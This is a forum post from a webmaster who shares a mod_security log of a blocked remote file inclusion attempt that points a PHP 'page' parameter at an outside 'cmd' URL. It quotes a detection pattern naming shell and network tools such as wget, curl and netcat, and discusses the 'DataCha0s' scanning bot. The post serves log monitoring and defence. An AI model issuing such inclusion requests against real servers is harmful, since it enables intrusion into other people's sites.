Does any one else monitor your web logs closely? Please check out this log [Fri Sep 14 16:27:13 2007] [error] [client xxx.xxx.xxx.xxx] mod_security: Access denied with code 503. Pattern match "(\\\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action| content|dir|name|menu|pm_path|path|pathtoroot|pagi na|path|include_location|root|page|gorumDir|site|p un_root|open|seite)=(http|https|ftp)\\\\:/|(cmd|command)=(cd|\\\\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\\\+\\\\+ |\\\\./|whoami|killall |rm \\\\-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.domainname.com"] [uri "/index.php?page=http://andravarldar.se/cmd?"] Suggest you may wish to block in your htaccess file # Block external script deny from 192.128.174.123 Anyone translate Eftersom sidan inte är byggd på ett säkert koncept tar jag ner den i förmån för de andra sidorna som ligger på kontot The command runs PHP CHAPLOIT.R this is a virus!!!! http://72.14.253.104/search?q=cache:...n&ct=clnk&cd=1 From Google DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here http://www.invasao.com.br/grupo04.htm Owner of the robot : Country : Robot type : unknown Description : This robot seems to look for unprotected AWStats installations. User Agent transmitted to the visited web server : * DataCha0s/2.0 http://www.invasao.com.br/downloads10.php they even have google adsense??